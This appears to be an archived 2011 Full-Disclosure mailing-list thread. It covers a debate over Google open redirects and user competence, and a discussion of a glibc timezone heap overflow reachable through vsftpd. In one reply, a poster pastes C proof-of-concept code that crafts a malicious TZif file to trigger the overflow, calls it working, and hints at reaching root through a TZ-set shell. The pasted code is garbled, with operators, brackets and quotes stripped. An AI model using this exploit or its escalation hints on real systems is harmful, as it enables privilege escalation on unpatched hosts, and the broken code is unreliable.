They may be in the minority, but there *are* users out there who know how to look at the address bar. The security researcher knows this because he is one of them. I call this group the competent and contentious users. Sure. And that group is sort of safe when faced with open redirectors, mouseover tooltips, etc - well, modulo funny corner cases like this: http://lcamtuf.coredump.cx/switch/ ...or: http://lcamtuf.coredump.cx/switch/index2.html I have seen the most users don't understand X anyway as an argument against fixing X in the browser several times before, and I think that's wrong; but I'm not sure this is applicable here. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google open redirect
On Fri, 09 Dec 2011 14:31:15 CST, Marsh Ray said: They may be in the minority, but there *are* users out there who know how to look at the address bar. The security researcher knows this because he is one of them. I call this group the competent and contentious users. Did you mean contentious (argumentative, difficult)? Or were you thinking of conscientious (dedicated to a cause)? ;) What vendors *really* hate are users who are both. ;) pgpxsoJ7wlm9j.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google open redirect
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 09/12/2011 20:31, Marsh Ray wrote: On 12/08/2011 12:37 AM, Michal Zalewski wrote: For time being, if you make security decisions based on onmouseover tooltips, link text, or anything along these lines, and do not examine the address bar of the site you are ultimately interacting with, there is very little any particular web application can do to save you: you are just at a significant risk wherever you go. If you take away open redirectors, a myriad of other, comparable ways to fool you remain, and can't be fixed easily. I think reasoning based on this is subtly fallacious and it often contributes to disagreements between researchers and large vendors. This is how we got into the state of the web today: bad faith on the part of browser vendors. They may be in the minority, but there *are* users out there who know how to look at the address bar. The security researcher knows this because he is one of them. I call this group the competent and contentious users. Large vendors are constantly holding bad faith against their userbase. This may be borne out by large user studies, but I've lost count of the number of times I've heard actual security improvements shot down because typical users are presumed to be so incompetent and careless that they will fail to derive a significant benefit from it. I maintain that design decisions affecting security must be driven by the needs of the competent and contentious user because if he cannot achieve effective security in using of the system, then what chance has the typical user?! Avoiding security improvements because the are perceived as being of little benefit to type typical user is wrong. Doing so gains nothing for the typical users, it decreases the security available to competent and contientious users, and worst of all it actively removes any incentives for the typical user to begin to take responsibility for their own security. I think when the typical user gets pwned with phishing or malware he thinks a combination of stupid Microsoft, the Internet is out to get me, and what did I do wrong?. The vendor implicitly answers: you did nothing wrong because this is all too complicated for you to understand, you should install this additional product to give you better security. Perhaps this made sense back when the Internet was a toy and the biggest security risk was a limited-liability credit card number, but today we have whole populations in places like Iran wondering if their ass is going to get tortured over something they said on social media. I think a lot of typical users today are probably wanting to move into that other category and we should support them in that. - Marsh Whilst I agree with what you have said the majority of computer users today are just consumers. They expect their nice new shiny Win 7 laptop to behave just like their washing machine. Push a button and it does what is expected, they don't expect to have to understand how it works nor do they expect it to do bad things when they are not looking. Occasionally a scam may make head line news, but the attention span and memory of the average consumer is measured in days or weeks not a lifetime. The marketing blurb from software providers be that OS or application does nothing to dispel this expectancy. In fact the marketing blurb does it's best to hide any possibility of detriment from using the product from the user. The user does blame MS or the Internet and very rarely their own incompetence in using the computing device. Why? because all the marketing blurb for such devices avoids any indication that using said device may result in the compromise of identity or bank account. Where does the advertising for computing devices state that the system is flawed? Nowhere. The consumer is given this image of a wonderful device doing wonderful things. A device that would never bend them over when they least expect it. The solution is either make the Internet and computers totally secure, or educate the user that the system, be that OS, application or Internet is broken and they need to be on their guard against what may happen for every click they make. I like to think I am somewhat competent. The last virus I had, the last compromise I faced was the Saddam virus on my Amiga. My confidence doesn't make feel I that I will never be owned or compromised. There are far smarter people out there than I. The average consumer does not think this way, they are drunk on the kool aid. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTuKAVrIvn8UFHWSmAQJ/lwf+K8bxBc8lUzwkQ7gA82eqfhU6pBPAJhcg CpHk1jYaeIlnGrWxWwpwxdoxCnvmiDDnqrRgsJrA/JQyLBJGDF082St85CVn6Up4 zKufd8fyxk9jtJTOL47z7XWbaIuGJb748zhdVTLbBBDmrY5eP8HueVhnT9puGUl4
[Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)
-- Weitergeleitete Nachricht -- Von: HI-TECH . isowarez.isowarez.isowa...@googlemail.com Datum: 10. Dezember 2011 00:44 Betreff: Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity) An: Ramon de C Valle rcva...@redhat.com Hi Ramon, Frankly I didn't look into the possibility to exploit this vulnerability, so i do not know if it is easy or hard to exploit. As you outlined it is difficult, during your audit you did not manage to trigger a function pointer call? : i guess not I am not much into exploiting heap based overruns in the old times fashion. BTW both freebsd and pure-ftpd load locale files (strace it and you will see) from /usr, these locale files are used for the ftp responses to make them written in international language. FreeBSD ftpd in junction with the locale files loading will SIGSEGV (EIP overwrite) due to a strcpy in locale responses in a special codepath. I did not find a way to exploit Pure-FTPD through this locale loading tough, because Pure-FTPD is very restrictive in many ways even on response lines but there might be a vuln there too. (I dont remember if locale loading was only on FreeBSD or also on Linux or also in vsftpd, since the libc behaves very different in BSD/glibc/eglibc etc) Regards, Kingcope Am 9. Dezember 2011 19:32 schrieb Ramon de C Valle rcva...@redhat.com: This is afaik a patched CVE in Linux glibc [1] which can be triggered through the very secure ftp daemon [2] so it will only work on older linux distros. Be aware that vsftpd has privilege seperation built in so this bug will not yield a root shell. It could yield root only in junction with a linux kernel vulnerability because the attacker will not be able to break the chroot without being root. This bug has a low severity because it's hard to exploit. Linux systems without patched glibc are vulnerable even if the latest version vsftpd-2.3.4 is installed. The bug is in the glibc timezone code. vsftpd loads timezone files from /usr [3]. If the attacker is inside a chroot he can easily create this directory and the timezone file and trigger the heap overrun. A Debugging Session illustrating the bug can be found on youtube: http://www.youtube.com/watch?v=KRCuozBM_dQ I did a brief analysis of this issue. And it seems vsftpd does not add anything to this as an attack vector. Althought we can control the size of the chunk to be allocated (i.e. transitions), and can arbitrarily allocate this chunk from fast bins, the main arena, or eventually, a new mmap()'ed heap. We do not have any control over when its adjacent chunks are allocated, freed, the type of their contents, when they will be used, how they will be used, and if they will be used and useful at all. In addition, the data used to overflow (i.e. transition times) are read and decoded as 4-byte integers in network (big-endian) byte order, which increases the difficulty in faking any structure, such as the adjacent allocated chunk to, at least, get outside of glibc scope after the overflow--since all return paths from __tzfile_read frees our controlled previously allocated chunk. Do you or anyone know a way to potentially exploit this vulnerability? Cheers! Thanks, [1] http://dividead.wordpress.com/tag/heap-overflow/ [2] https://security.appspot.com/vsftpd.html [3] For example /usr/share/zoneinfo/UTC-01:00 /Kingcope -- Ramon de C Valle / Red Hat Security Response Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)
There is, an exploit for this.. if you look around... it also,
works...and, u do have the src... i will pastebin it, just to makesure
no one cries :s
#include stdio.h
#include stdint.h
#include time.h
#include string.h
#define TZ_MAGICTZif
#define PUT_32BIT_MSB(cp, value)\
do {\
(cp)[0] = (value) 24;\
(cp)[1] = (value) 16;\
(cp)[2] = (value) 8; \
(cp)[3] = (value); \
} while (0)
struct tzhead {
chartzh_magic[4];
chartzh_version[1];
chartzh_reserved[15];
chartzh_ttisgmtcnt[4];
chartzh_ttisstdcnt[4];
chartzh_leapcnt[4];
chartzh_timecnt[4];
chartzh_typecnt[4];
chartzh_charcnt[4];
};
struct ttinfo {
long int offset;
unsigned char isdst;
unsigned char idx;
unsigned char isstd;
unsigned char isgmt;
};
int main(void) {
struct tzhead evil;
int i;
char *p;
uint32_t total_size;
uint32_t evil1, evil2;
memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);
evil.tzh_version[0] = 0;
memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));
memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));
memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));
memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));
memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));
evil1 = 500;
PUT_32BIT_MSB(evil.tzh_timecnt, evil1);
total_size = evil1 * (sizeof(time_t) + 1);
total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
~(__alignof__ (struct ttinfo) - 1));
evil2 = 0 - total_size;
PUT_32BIT_MSB(evil.tzh_charcnt, evil2);
p = (char *)evil;
for (i = 0; i sizeof(evil); i++)
printf(%c, p[i]);
putenv(TZ=`pwd`/%s,evil);
for (i = 0; i 5; i++)
//printf([+] Got root ..\n);
printf(A);
}
Sorry but, i did remove the exec line and setuid but, also you must
setend TX=/path/to/nice/shell ,and then you might get somewhere... it
is tricky, as there is the setenv, wichcan be done, i have made that
happen, but, it takes anopther .c file for this... but, i did also,
modify this original one by someone else, wich, only prints...the
overflow and trigger./.but, to get root, you must play with bash
alittle...but yea, it is verymuch also a propblem, anyhow, i was
recently involved with tzdata patch, and, i had reported bugs goin
back ages... anyhow, thx to dividead for his Timezone stuff... but, it
is tricky one..but, very good :P , like, if setup similar to a
sendpage socket to socket, you may be able to send shellcode, to
unset/setenv TZ= , so then it can exec, but, unless it calls that
before adding setuid(0); etc... it wont work on prolly, anything...
dividead made a grat post on it but, i have already hinted at bugs in
glib b4, guess, i dont like to give away, what kids dont need...
anyhow this is working buffer overflow for that CVE exactly.
have fucking fun assholes ./rant
On 10 December 2011 10:47, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
-- Weitergeleitete Nachricht --
Von: HI-TECH . isowarez.isowarez.isowa...@googlemail.com
Datum: 10. Dezember 2011 00:44
Betreff: Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity)
An: Ramon de C Valle rcva...@redhat.com
Hi Ramon,
Frankly I didn't look into the possibility to exploit this vulnerability,
so i do not know if it is easy or hard to exploit. As you outlined
it is difficult, during your audit you did not manage to trigger a
function pointer call? : i guess not
I am not much into exploiting heap based overruns in the old times fashion.
BTW both freebsd and pure-ftpd load locale files (strace it and you
will see) from /usr,
these locale files are used for the ftp responses to make them written
in international language.
FreeBSD ftpd in junction with the locale files loading will SIGSEGV
(EIP overwrite)
due to a strcpy in locale responses in a special codepath. I did not
find a way to exploit Pure-FTPD through this
locale loading tough, because Pure-FTPD is very restrictive in many ways even
on response lines but there might be a vuln there too. (I dont
remember if locale loading was only
on FreeBSD or also on Linux or also in vsftpd, since the libc behaves
very different in BSD/glibc/eglibc etc)
Regards,
Kingcope
Am 9. Dezember 2011 19:32 schrieb Ramon de C Valle rcva...@redhat.com:
This is afaik a patched CVE in Linux glibc [1] which can be triggered
through
the very secure ftp daemon [2] so it will only work on older linux distros.
Be aware that vsftpd has privilege seperation built in so this bug
will not yield a root shell.
It
Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)
http://dividead.wordpress.com/tag/heap-overflow/ oh wow, amazing, someone has already posted but, anyhow, the things explained, here...and yes, if it overflows then ofc it can lead to possible root fucuall fd /XD On 10 December 2011 10:47, HI-TECH . isowarez.isowarez.isowa...@googlemail.com wrote: -- Weitergeleitete Nachricht -- Von: HI-TECH . isowarez.isowarez.isowa...@googlemail.com Datum: 10. Dezember 2011 00:44 Betreff: Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity) An: Ramon de C Valle rcva...@redhat.com Hi Ramon, Frankly I didn't look into the possibility to exploit this vulnerability, so i do not know if it is easy or hard to exploit. As you outlined it is difficult, during your audit you did not manage to trigger a function pointer call? : i guess not I am not much into exploiting heap based overruns in the old times fashion. BTW both freebsd and pure-ftpd load locale files (strace it and you will see) from /usr, these locale files are used for the ftp responses to make them written in international language. FreeBSD ftpd in junction with the locale files loading will SIGSEGV (EIP overwrite) due to a strcpy in locale responses in a special codepath. I did not find a way to exploit Pure-FTPD through this locale loading tough, because Pure-FTPD is very restrictive in many ways even on response lines but there might be a vuln there too. (I dont remember if locale loading was only on FreeBSD or also on Linux or also in vsftpd, since the libc behaves very different in BSD/glibc/eglibc etc) Regards, Kingcope Am 9. Dezember 2011 19:32 schrieb Ramon de C Valle rcva...@redhat.com: This is afaik a patched CVE in Linux glibc [1] which can be triggered through the very secure ftp daemon [2] so it will only work on older linux distros. Be aware that vsftpd has privilege seperation built in so this bug will not yield a root shell. It could yield root only in junction with a linux kernel vulnerability because the attacker will not be able to break the chroot without being root. This bug has a low severity because it's hard to exploit. Linux systems without patched glibc are vulnerable even if the latest version vsftpd-2.3.4 is installed. The bug is in the glibc timezone code. vsftpd loads timezone files from /usr [3]. If the attacker is inside a chroot he can easily create this directory and the timezone file and trigger the heap overrun. A Debugging Session illustrating the bug can be found on youtube: http://www.youtube.com/watch?v=KRCuozBM_dQ I did a brief analysis of this issue. And it seems vsftpd does not add anything to this as an attack vector. Althought we can control the size of the chunk to be allocated (i.e. transitions), and can arbitrarily allocate this chunk from fast bins, the main arena, or eventually, a new mmap()'ed heap. We do not have any control over when its adjacent chunks are allocated, freed, the type of their contents, when they will be used, how they will be used, and if they will be used and useful at all. In addition, the data used to overflow (i.e. transition times) are read and decoded as 4-byte integers in network (big-endian) byte order, which increases the difficulty in faking any structure, such as the adjacent allocated chunk to, at least, get outside of glibc scope after the overflow--since all return paths from __tzfile_read frees our controlled previously allocated chunk. Do you or anyone know a way to potentially exploit this vulnerability? Cheers! Thanks, [1] http://dividead.wordpress.com/tag/heap-overflow/ [2] https://security.appspot.com/vsftpd.html [3] For example /usr/share/zoneinfo/UTC-01:00 /Kingcope -- Ramon de C Valle / Red Hat Security Response Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
